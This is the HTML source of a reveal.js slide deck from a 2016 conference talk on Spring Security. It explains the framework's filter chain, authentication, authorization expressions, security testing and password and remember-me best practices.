forked from hakimel/reveal.js
-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathspring-security.html
1040 lines (992 loc) · 66.1 KB
/
spring-security.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>Spring Security, 2016</title>
<link rel="stylesheet" href="css/reveal.css">
<link rel="stylesheet" href="css/clock.css">
<link rel="stylesheet" href="css/theme/night.css" id="theme">
<!-- Theme used for syntax highlighting of code -->
<link rel="stylesheet" href="lib/css/zenburn.css">
<!-- Printing and PDF exports -->
<script>
var link = document.createElement( 'link' );
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
document.getElementsByTagName( 'head' )[0].appendChild( link );
</script>
<style>
.documentation {
font-family: sans-serif;
color: #fff;
display: inline-block;
font-weight: 100;
text-align: center;
position:absolute;
margin: 15px;
top:0;
right:100px;
z-index: 100;
}
.documentation > div{
padding: 10px;
border-radius: 3px;
background: #343434;
display: inline-block;
}
.documentation div > a {
color: #cecece;
text-decoration: none;
padding: 10px;
border-radius: 3px;
background: #252525;
display: inline-block;
}
.documentation > div:hover {
background: #8b8b8b;
}
.documentation div:hover > a {
background: #606060;
}
</style>
</head>
<body>
<div class="documentation">
<div>
<a href="http://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/" target="_blank">Docs</a>
</div>
</div>
<div style="display: block; position: absolute; bottom: 40px; left: 50%; width: 1000px; margin-left: -500px; z-index: 20;">
<table style="width: 100%">
<tr>
<td style="text-align: center; width: 20%"><span style="font-size: 80%; color: #e7ad52;">Pořadatel</span></td>
<td style="text-align: center; width: 20%"><span style="font-size: 80%; color: #e7ad52;">Konference</span></td>
<td style="text-align: center; width: 20%"></td>
<td style="text-align: center; width: 20%"><span style="font-size: 80%; color: #e7ad52;">Gold partner</span></td>
<td style="text-align: center; width: 20%"><span style="font-size: 80%; color: #e7ad52;">Generální partner</span></td>
</tr>
<tr>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a target="_blank" href="http://www.gopas.cz" target="_blank"><img src="img/javadayscz2016/Gopas_skola_bile.png" height="30px"/></a>
</td>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a target="_blank" href="http://www.javadays.cz" target="_blank"><img src="img/javadayscz2016/JD_white_02.png" height="40px"/></a>
</td>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a target="_blank" href="http://www.fg.cz" target="_blank"><img src="img/jopenspace2013/FG_Forrest_neg.png" height="30px"/></a>
</td>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a target="_blank" href="https://www.jetbrains.com/" target="_blank"><img src="img/javadayscz2016/horizontal_spelling_jetbrains_web_logo.png" height="20px"/></a>
</td>
<td style="text-align: center; vertical-align: bottom; padding-top: 2px; width: 20%">
<a target="_blank" href="http://www.commerzsystems.com/" target="_blank"><img src="img/javadayscz2016/Logo-CommerzSystems_JavaDays2016_Pocitacova_skola_GOPAS.png" height="30px"/></a>
</td>
</tr>
</table>
</div>
<div class="reveal">
<div class="slides">
<!-- INTRO -->
<section data-background="img/backgrounds/black.jpg">
<section data-background="img/backgrounds/black.jpg">
<h1>Spring Security</h1>
<h2>your gate to authentication and authorization</h2>
<h3>autumn 2016</h3>
<img class="plain" src="img/javadayscz2016/javadays-logo.png">
<p>
<small>Jan <a href="http://www.twiter.com/novoj">@Novoj</a> Novotný</small>
</p>
</section>
<section data-background="img/backgrounds/jno.jpg" data-background-size="contain" style="padding-left: 25%">
<h4 style="margin-bottom: 4em;">
<span style="font-size: 180%">Follow presentation with me at</span><br/>
<a href="http://novoj.github.io/reveal.js/spring-security.html" style="font-size: 125%">http://novoj.github.io/reveal.js/spring-security.html</a>
</h4>
<h1>About me</h1>
<ul style="margin-left: 3em;">
<li><a href="https://www.fg.cz">Java developer at FG Forrest</a></li>
<li><a href="https://kafemlejnek.tv">YouTuber at Kafemlejnek.TV</a></li>
<li><a href="http://blog.novoj.net">blogger at blog.novoj.net</a></li>
<li><a href="http://jopenspace.cz">jOpenspace non-conference co-organizer</a></li>
<li><a href="https://www.monkeytracker.cz">co-author of MonkeyTracker service</a></li>
<li>using Spring (Acegi) Security since 2007</li>
<li>occassional speaker, father,<br/>MTB rider, runner ...</li>
</ul>
</section>
<section data-background="img/backgrounds/brown.jpg">
<h1>What Spring Security covers</h1>
<ol>
<li>
<strong>authentication</strong>
<ul>
<li>Http Basic/Digest/x-509, LDAP, Kerberos, JAAS, OAuth, social networks</li>
<li>password generation / matching, remember me</li>
</ul>
</li>
<li>
<strong>authorization</strong>
<ul>
<li>url pattern matching</li>
<li>method call authorization, I/O data filtering</li>
<li>expression based / ACL based</li>
</ul>
</li>
<li>
<strong>security negotiation / enforcement</strong>
<ul>
<li>HTTP headers</li>
<li>HTTPS switching</li>
<li>Session management</li>
<li>CSRF protection</li>
<li>Cross-origin resource sharing</li>
</ul>
</li>
<li><strong>test support</strong></li>
</ol>
</section>
<section data-background="img/backgrounds/brown.jpg">
<h1>Why should you consider it?</h1>
<ol style="text-wrap: avoid">
<li>easy to implement</li>
<li>Spring integration (as you'd expect)</li>
<li>mature and widespread (Acegi started in 2003)</li>
<li>still in active development</li>
<li>easy extensible</li>
<li>well documented and tested</li>
</ol>
</section>
</section>
<!-- ARCHITECTURE -->
<section data-background="img/backgrounds/brown.jpg">
<section data-transition="slide-in fade-out">
<h1>Architecture overview</h1>
<img class="plain" src="img/spring-security/filters.png" alt="Spring security web integration" style="width: 50%; float: left">
<span style="width: 45%">
firewalls HTTP request / response<br/>
(<a href="https://en.wikipedia.org/wiki/Directory_traversal_attack">directory traversal</a>, <a href="https://prakharprasad.com/crlf-injection-http-response-splitting-explained/">http response splitting</a>)
<br/><br/>
executes internal list of filters
<br/><br/>
<strong>Why?</strong>
<br/><br/>
<ul>
<li>single definition in web.xml <br/> (even if it's complex inside)</li>
<li>reliable "interruption" <br/> of every single request processing</li>
</ul>
</span>
</section>
<section data-transition="fade-in fade-out">
<h1>Architecture overview</h1>
<img class="plain" src="img/spring-security/filters-dispatch.png" alt="Spring security web integration" style="width: 50%; float: left">
<p style="width: 45%; display: inline-block">
set of filters can differ for various path patterns<br/>
<em style="font-size: 80%">(org.springframework.security.web.SecurityFilterChain)</em><br/><br/>
path matching is done via <em>RequestMatcher</em><br/>
mostly via <em>AntPathRequestMatcher</em> but also <em>RegexRequestMatcher</em> and more
</p>
<pre style="width: 45%; display: inline-block">
<code data-trim data-noescape>/foo/*/bar/**/data/*.jpg
/foo/**
/bar/*
/*.html</code>
</pre>
</section>
<section data-transition="fade-in fade-out">
<h1>Architecture overview</h1>
<h2>Standard filter composition</h2>
<div>
<img class="plain" src="img/spring-security/filters-standard.png" alt="Spring security web integration" style="width: 25%; float: left">
<ol style="width: 45%; display: inline-block; padding-top: 2em; font-size: 80%">
<li style="margin-bottom: 0.75em">loads SecurityContext from SecurityContext repository (usually HTTP session) and store it there also</li>
<li style="margin-bottom: 0.75em">monitors specific URL and logs a user out</li>
<li style="margin-bottom: 0.75em">does authentication (username, LDAP, OAuth ...)</li>
<li style="margin-bottom: 0.75em">handles AccessDeniedException and AuthenticationException navigating user to proper locations</li>
<li style="margin-bottom: 0.75em">examines each request against AccessDecisionManager and throws AccessDeniedException eventually</li>
<li style="margin-bottom: 0.75em">stores SecurityContext</li>
</ol>
</div>
<div style="font-size: 80%; text-align: center; clear: both">
<a href="http://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/ns-config.html#filter-stack">Standard filters and their ordering</a>
</div>
</section>
<section data-transition="fade-in slide-out">
<h1>Architecture overview</h1>
<h3>Channel enforcement</h3>
<p>ChannelProcessingFilter - relocates user from HTTP to HTTPS (and vice versa) when <em>ChannelDecisionManager</em> says so</p>
<h3>HTTP headers management</h3>
<p>HeaderWriterFilter - takes care of writing HTTP security headers to the response</p>
<ul>
<li><a href="http://blogs.msdn.com/b/ieinternals/archive/2011/01/31/controlling-the-internet-explorer-xss-filter-with-the-x-xss-protection-http-header.aspx">XXssProtectionHeaderWriter</a></li>
<li><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options">XFrameOptionsHeaderWriter</a></li>
<li><a href="http://tools.ietf.org/html/rfc6797">HstsHeaderWriter</a></li>
<li>StaticHeadersWriter (for instance CacheControlHeadersWriter)</li>
</ul>
<h3>Session management</h3>
<p>ConcurrentSessionFilter - tracks presence of all sessions,<br/> SessionManagementFilter - enforces session management</p>
</section>
</section>
<!-- CONFIGURATION -->
<section data-background="img/backgrounds/brown.jpg">
<h1>Configuration</h1>
<p>Both types of configuration are similar one to another.</p>
<div style="text-align: center; float: left; width: 47%; display: inline-block">
<h3>Security namespace</h3>
<a style="margin: 2em;" href="https://gist.github.com/novoj/2299f52b770f5610071e94078b1c1597"><img class="plain" src="img/spring-security/xml-file.png" height="128px"></a><br/>
<a style="margin: 2em;" href="https://gist.github.com/novoj/2299f52b770f5610071e94078b1c1597">Click to show</a>
</div>
<div style="text-align: center; width: 47%; display: inline-block">
<h3>Java configuration</h3>
<a style="margin: 2em;" href="https://gist.github.com/novoj/f3e8a7a47e262ba79776089aeb98092c"><img class="plain" src="img/spring-security/java-file.png" height="128px"></a><br/>
<a style="margin: 2em;" href="https://gist.github.com/novoj/f3e8a7a47e262ba79776089aeb98092c">Click to show</a>
</div>
</section>
<!-- AUTHENTICATION -->
<section data-background="img/backgrounds/brown.jpg">
<section data-transition="fade-in fade-out">
<section data-transition="slide-in">
<h1>Authentication process</h1>
<img src="img/spring-security/resources-access.png" alt="Secured resource access" style="max-height: 600px">
</section>
</section>
<section data-transition="fade-in fade-out">
<h1>Login</h1>
<div>
<img class="plain" src="img/spring-security/login.png" alt="Login" style="width: 15%; float: left">
<ul>
<li>always use HTTPS protocol</li>
<li>always use POST</li>
<li>use CSRF token</li>
<li>use the same error message when credentials don't match</li>
</ul>
</div>
<div style="clear: both; text-align: center">
<a style="margin: 2em;" href="http://localhost:8091/?message=views/login.html">Example</a>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Login</h1>
<div style="text-align: center; float: left; width: 47%; display: inline-block">
<h3>What happens during login</h3>
<p style="text-align: left; font-size: 80%">
Typically <a href="http://localhost:8091/?message=org/springframework/security/web/authentication/UsernamePasswordAuthenticationFilter.java">UsernamePasswordAuthenticationFilter</a>
uses <a href="http://localhost:8091/?message=org/springframework/security/authentication/ProviderManager.java">AuthenticationManager</a> that calls
<a href="http://localhost:8091/?message=org/springframework/security/authentication/AuthenticationProvider.java">AuthenticationProvider</a> (usually
<a href="http://localhost:8091/?message=org/springframework/security/authentication/dao/DaoAuthenticationProvider.java">DaoAuthenticationProvider</a>)
to load user details from <a href="http://localhost:8091/?message=org/springframework/security/core/userdetails/UserDetailsService.java">UserDetailsService</a> implementation.
</p>
<p style="text-align: left; font-size: 80%"><a href="http://localhost:8091/?message=org/springframework/security/authentication/dao/DaoAuthenticationProvider.java">DaoAuthenticationProvider</a>
checks validity of the password via <a href="http://localhost:8091/?message=org/springframework/security/crypto/password/PasswordEncoder.java">PasswordEncoder</a>.</p>
<p style="text-align: left; font-size: 80%">When password is ok, new <a href="http://localhost:8091/?message=org/springframework/security/core/Authentication.java">Authentication</a> object is created and stored in
<a href="http://localhost:8091/?message=org/springframework/security/core/context/SecurityContext.java">SecurityContext</a>.</p>
</div>
<div style="text-align: center; width: 47%; display: inline-block">
<h3>Subsequent requests</h3>
<p style="text-align: left; font-size: 80%">
<a href="http://localhost:8091/?message=org/springframework/security/web/context/SecurityContextPersistenceFilter.java">SecurityContextPersistenceFilter</a>
fills <a href="http://localhost:8091/?message=org/springframework/security/core/context/SecurityContextHolder.java">SecurityContextHolder</a> (usually <em>ThreadLocal</em>) with
<a href="http://localhost:8091/?message=org/springframework/security/core/context/SecurityContext.java">SecurityContext</a> from
<a href="http://localhost:8091/?message=org/springframework/security/web/context/SecurityContextRepository.java">SecurityContextRepository</a>
</p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Logout</h1>
<img class="plain" src="img/spring-security/logout.png" alt="Logout" style="width: 15%; float: left">
<div>
<div style="float: left; margin-left: 2em;">
<h4>Recommendations</h4>
<ul>
<li>always use POST</li>
<li>use CSRF token</li>
</ul>
</div>
<div style="margin-left: 2em;">
<h4>What happens on logout</h4>
<ul>
<li>session is invalidated</li>
<li>remember me tokens are cleared</li>
<li>custom cookies might be cleared</li>
<li>CSRF token is invalidated</li>
<li>SecurityContext is emptied</li>
<li>user is navigated to logout page</li>
</ul>
</div>
</div>
<div style="clear: both; text-align: center; margin-top: 1em;">
<a style="margin: 2em;" href="http://localhost:8091/?message=views/layout.html:85">Example</a>
</div>
</section>
</section>
<!-- AUTHORIZATION -->
<section data-background="img/spring-security/authorization.jpg" data-background-size="30%" data-background-color="black" data-background-position="left">
<section data-transition="fade-in fade-out">
<h1>Authorization</h1>
<div style="float: left; width: 65%; font-size: 80%; text-align: right">
<img class="plain" src="img/spring-security/auth-model.png">
</div>
<div style="float: left; margin-left: 2em; width: 30%; font-size: 60%;">
<h3>AccessDecisionManager</h3>
<ul style="width: 100%">
<li>AffirmativeBased:<br/><em>SINGLE GRANT -> GRANT</em></li>
<li>UnanimousBased:<br/><em>SINGLE DENY -> DENY</em></li>
<li>ConsensusBased:<br/><em>sum(GRANT) > sum(DENY) -> GRANT</em></li>
</ul>
<h3 style="margin-top: 1em">AccessDecisionVoter</h3>
<ul style="width: 100%">
<li>AuthenticatedVoter:<br/><em>IS_AUTHENTICATED_FULLY, IS_AUTHENTICATED_REMEMBERED, IS_AUTHENTICATED_ANONYMOUSLY</em></li>
<li>RoleVoter (RoleHierarchyVoter):<br/><em>ROLE_ (GrantedAuthority)</em></li>
<li>WebExpressionVoter:<br/><em>SpEL expression</em></li>
</ul>
</div>
<div style="clear: both; width: 85%; float: right; margin-top: 1em">
<strong>SecurityConfig example:</strong>
<pre style="display: inline-block;"><code class="xml" data-trim data-noescape="true">/admin/**=<mark>ROLE_ADMINISTRATOR</mark>, <mark>ROLE_SUPER_ADMINISTRATOR</mark>
/userManagement/**=<mark>#{hasRole('ROLE_COMPANY_OWNER') and hasIpAddress('192.168.1.0/24')</mark>
/**=<mark>IS_AUTHENTICATED_ANONYMOUSLY</mark></code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Built-in-expressions</h1>
<a href="http://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/el-access.html#el-common-built-in">
<img src="img/spring-security/built-in-expressions.png" width="800">
</a>
</section>
<section data-transition="fade-in fade-out">
<h1>Web expression security</h1>
<p>You can use either <em>simple rules</em> or <em>expression rules</em>, not both.</p>
<div style="clear: both; width: 75%; margin-left: 15%">
<pre style="display: inline-block;"><code class="xml" data-trim><http use-expressions="true">
<intercept-url pattern="/user/{userId}/**"
access="@myAuthService.checkUserId(authentication,#userId)"/>
</http></code></pre>
<p>@ refers to Spring bean objects<br/>
# refers to url parameters</p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Method security</h1>
<p>Operates using Spring AOP abstraction.<br/>Thus you can configure it manually by custom Aspects or exact mapping.</p>
<h3>Expression based security</h3>
<div style="width: 25%; margin-left: 15%; float: left;">
<p>Method annotations:</p>
<ul style="list-style-type: none">
<li>@PreAuthorize</li>
<li>@PreFilter</li>
<li>@PostAuthorize</li>
<li>@PostFilter</li>
</ul>
</div>
<div style="float: left; width: 55%; font-size: 100%; margin-left: 2em;">
<p>
<pre style="display: inline-block;"><code class="java" data-trim>@PreAuthorize("#contact.name == authentication.name")
public void doSomething(Contact contact);
@PreAuthorize("hasRole('USER')")
@PostFilter("hasPermission(filterObject, 'read')")
public List<Contact> getAll();</code></pre>
</p>
<p>Filtering is not suitable for paged output.<br/>
But Spring Security can <a href="http://docs.spring.io/spring-security/site/docs/4.2.x-SNAPSHOT/reference/html/data-query.html">integrate with Spring Data</a>!</p>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Hieararchical roles</h1>
<div style="clear: both">
<p>Useful in scenarios when user having certain role<br/>should also have another role.</p>
<strong>Example:</strong>
</div>
<div style="clear: both; width: 30%; margin-left: 35%">
<pre style="display: inline-block;"><code class="xml" data-trim>ROLE_ADMIN > ROLE_STAFF
ROLE_STAFF > ROLE_USER
ROLE_USER > ROLE_GUEST</code></pre>
</div>
<p>Admin will be also STAFF, USER, GUEST regarding access decision logic.<br/>Hierarchy rules can be changed without touching user data.</p>
</section>
<section data-transition="fade-in fade-out">
<h1>Permissions</h1>
<p>If you need more robust authorization system - ie. when roles are not enough.</p>
<p>Implement your own <a href="http://localhost:8091/?message=org/springframework/security/access/PermissionEvaluator.java">PermissionEvaluator</a></p>
<div style="clear: both; width: 95%; margin-left: 5%; font-size: 90%;">
<pre style="display: inline-block;"><code class="java" data-trim>public interface PermissionEvaluator extends AopInfrastructureBean {
boolean hasPermission(Authentication authentication, Object targetDomainObject, Object permission);
boolean hasPermission(Authentication authentication, Serializable targetId, String targetType, Object permission);
}</code></pre>
</div>
<p>And configure it:</p>
<div style="clear: both; width: 95%; margin-left: 5%; font-size: 80%;">
<pre style="display: inline-block;"><code class="xml" data-trim><security:global-method-security pre-post-annotations="enabled">
<security:expression-handler ref="expressionHandler"/>
</security:global-method-security>
<bean id="expressionHandler"
class="org.springframework.security.access.expression.method.DefaultMethodSecurityExpressionHandler">
<property name="permissionEvaluator" ref="myPermissionEvaluator"></property>
</bean></code></pre>
</div>
<p>Or use <a href="http://docs.spring.io/spring-security/site/docs/current/reference/html/domain-acls.html">already implemented ACL system</a> from Spring Security.</p>
</section>
<section data-transition="fade-in fade-out">
<h1>Meta annotations</h1>
<p style="margin-left: 20%; text-align: center">Allows you to mitigate String based "programming".</p>
<div style="float: left; width: 80%; margin-left: 20%; margin-bottom: 2em;">
<h3>Define meta-annotation</h3>
<pre style="display: inline-block;"><code class="java" data-trim>@Retention(RetentionPolicy.RUNTIME)
@PreAuthorize("#contact.name == authentication.name")
public @interface ContactPermission {}</code></pre>
<h3>Use meta-annotation</h3>
<pre style="display: inline-block;"><code class="java" data-trim>@ContactPermission
public void doSomething(Contact contact);</code></pre>
</div>
<p style="margin-left: 20%; text-align: center">
Currently doesn't allow multiple annotations on a single method.
<br/><a href="https://github.com/spring-projects/spring-security/issues/4003">Issue #4003</a></em>
</p>
</section>
</section>
<!-- TESTING -->
<section data-background="img/spring-security/testing.png">
<section data-transition="fade-in fade-out">
<h1>Security testing</h1>
<h3>Best practices ™</h3>
<ul style="width: 80%">
<li><strong>do test</strong> the security in integration tests along with business logic</li>
<li>prepare set of <strong>personas</strong> for each roles</li>
<li>test <strong>negative scenarios</strong> that should finish with AccessDeniedException</li>
<li>complex security expression extract to <strong>access check method</strong> or
<strong>PermissionEvaluator</strong>, unit test these methods carefully</li>
</ul>
</section>
<section data-transition="fade-in fade-out">
<h1>Method authorization</h1>
<h3>Test example</h3>
<div style="float: left; width: 100%; margin-bottom: 2em;">
<pre style="display: inline-block;"><code class="java" style="font-size: 80%; max-height: 600px;" data-trim>@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration
@SecurityExecutionListeners
public class ExampleTestClass {
@Test(expected = AccessDeniedException.class)
@WithAnonymousUser
public void getMessageUnauthenticated() {
messageService.getMessage();
}
@Test
@WithUserDetails("[email protected]")
public void getMessageAsClientUser() {
assertNotNull(messageService.getMessage());
}
@Test
@WithUserDetails("[email protected]")
public void getMessageAsAdminUser() {
assertNotNull(messageService.getMessage());
}
}</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Test meta-annotations</h1>
<div style="float: left; width: 100%; margin-bottom: 2em;">
<p>To avoid strings in annotations and add better maintainability use meta-annotations:</p>
<pre style="display: inline-block;"><code class="java" style="font-size: 80%; max-height: 600px;" data-trim>@Retention(RetentionPolicy.RUNTIME)
@WithUserDetails(value="[email protected]")
public @interface RunAsAdministrator { }</code></pre>
<p>And use it in test:</p>
<pre style="display: inline-block;"><code class="java" style="font-size: 80%; max-height: 600px;" data-trim>@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration
@SecurityExecutionListeners
public class ExampleTestClass {
@Test
@RunAsClient
public void getMessageAsClientUser() {
assertNotNull(messageService.getMessage());
}
@Test
@RunAsAdmin
public void getMessageAsAdminUser() {
assertNotNull(messageService.getMessage());
}
}</code></pre>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Spring MVC test support</h1>
<div style="float: left; width: 100%; margin-bottom: 2em;">
<pre style="display: inline-block;"><code class="java" style="font-size: 70%; line-height: 1.4em; max-height: 600px;" data-trim>import static org.springframework.security.test.web.servlet.request.SecurityMockMvcRequestPostProcessors.*;
import static org.springframework.security.test.web.servlet.setup.SecurityMockMvcConfigurers.*;
import static org.springframework.security.test.web.servlet.request.SecurityMockMvcRequestBuilders.*;
@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration
@WebAppConfiguration
public class ExampleTestClass {
@Autowired
private WebApplicationContext context;
private MockMvc mvc;
@Before
public void setup() {
mvc = MockMvcBuilders.webAppContextSetup(context)
.apply(springSecurity())
.build();
}
@Test
@WithAnonymousUser
public void shouldUserLogin() {
mvc.perform(formLogin("/auth").user("admin").password("pass")).with(csrf()))
.andExpect(authenticated());
}
@Test
@RunAsClient
public void shouldUserLogout() {
mvc.perform(logout("/signout")).with(csrf()))
.andExpect(unauthenticated());
}
}</code></pre>
</div>
</section>
</section>
<!-- USER SWITCHING -->
<section data-background="img/backgrounds/brown.jpg">
<h1>User switching</h1>
<img src="img/spring-security/user-switch.png" alt="CSP overview" class="plain" width="200" style="float: left;">
<div style="float: left; margin-left: 2em; width: 65%; font-size: 80%;">
<p>Handy for developers as well as for customer administrators. Allows user with admin roles to switch
to any other user with lower roles without knowing password.</p>
<pre style="display: inline-block;"><code class="java" data-trim>@Override
protected void configure(HttpSecurity http) throws Exception {
final SwitchUserFilter filter = new SwitchUserFilter();
filter.setSwitchUserUrl("/switchUser");
filter.setUsernameParameter("username");
filter.setExitUserUrl("/restoreUserBack");
http.addFilterAfter(filter, FilterSecurityInterceptor.class)
.authorizeRequests()
.antMatchers("/switchUser").hasAnyAuthority("ROLE_ADMIN")
.antMatchers("/restoreUser").authenticated();
}</code></pre>
<p>Consider also adding an IP check or other authentication checks to better secure user switching.</p>
<p><strong>Warning!</strong> This feature is kind of a backdoor to your application.</p>
</div>
</section>
<!-- OUTRO -->
<section data-background="img/backgrounds/black.jpg">
<img src="img/backgrounds/attention.jpg" width="800"/>
<h2>Thank your for your attention</h2>
<p>Contact me at <a href="https://www.twitter.com/novoj">@Novoj</a> or <a href="mailto:[email protected]">[email protected]</a></p>
</section>
<!-- PASSWORD MANAGEMENT -->
<section data-background="img/backgrounds/brown.jpg">
<section data-transition="fade-in fade-out">
<h1>Password management</h1>
<img class="plain" src="img/spring-security/password.jpg" alt="Password" style="width: 30%; float: left">
<div style="text-align: left; float: left; margin-left: 2em; width: 65%; font-size: 80%;">
<h3>Hygienic rules to follow:</h3>
<ul>
<li>Use slow hashing function with unique salt per user (Spring Security default is Bcrypt)</li>
<li>Don't send passwords in e-mails.</li>
<li>Require strong passwords from users.</li>
<li>Send login credentials only over SSL.</li>
<li>When user changes his password / email require entering his current password.</li>
<li>Do not load users with passwords (hashes) into memory.</li>
</ul>
<h3 style="margin-top: 1em">Spring Security helps you with</h3>
<ul>
<li>hashing passwords</li>
<li>enforcing SSL</li>
<li>clearing pwd from logged in user object</li>
</ul>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Lost password facility</h1>
<h3>Hygienic rules to follow:</h3>
<img class="plain" src="img/spring-security/reset.png" alt="Reset password" style="width: 30%; float: left">
<div style="float: left; margin-left: 2em; width: 65%; font-size: 80%;">
<ul>
<li>If a user forgets their password, send them a secure one-time reset link, using a randomly generated reset token stored in the database. The token must be unique and secret, so hash the token in the database and compare it when the link is used.</li>
<li>Do have same response when user exists as well as if he does not.</li>
<li>Enforce that a token can only be used to reset the password of the user who requested it.</li>
<li>Store token in database only in a "hashed" version.</li>
<li>Once the token is used, it must be deleted from the database and must not be allowed to be used again.</li>
<li>Have all password-equivilent tokens, including reset tokens, expire after a short time, e.g. 48 hours. This prevents an attacker exploiting unused tokens at a later date.</li>
<li>Immediately display a form to allow the user to set a new password. Do not use temporary random generated passwords!</li>
<li>Do not use "secret questions".</li>
</ul>
</div>
</section>
</section>
<!-- REMEMBER ME -->
<section data-background="img/backgrounds/brown.jpg">
<section data-transition="fade-in fade-out">
<h1>Remember me, hot or not?</h1>
<div style="text-align: center">
<img class="plain" src="img/spring-security/remember-me.png" alt="Keep me signed in" style="width: 25%;">
</div>
<div style="float: left; margin-left: 2em;">
<h4>Things to consider</h4>
<ul>
<li>users do like it</li>
<li>when stealed logs anyone in</li>
<li>it opens gap for CSRF attack</li>
<li>it may reveal original password</li>
</ul>
</div>
<div style="margin-left: 2em;">
<h4>2-basic implementations</h4>
<ul>
<li>Hash-Based Token (default)</li>
<li>Persistent Token Approach</li>
</ul>
</div>
</section>
<section data-transition="fade-in fade-out">
<h1>Remember me, hot or not?</h1>
<div style="float: left; margin-left: 2em;">
<h4>Require interactive login for</h4>
<ul>
<li>password change</li>
<li>email change</li>
<li>access to sensitive information (address)</li>
<li>important actions (purchase)</li>
</ul>
</div>
<div style="margin-left: 2em;">
<h4>Consider</h4>
<ul>
<li>HTTPS over entire site</li>
<li>secure only cookie (explicitly set necessary)</li>
<li>http only cookie (explicitly set necessary)</li>
</ul>
</div>
<div style="clear: both; margin-top: 2em">
<pre>
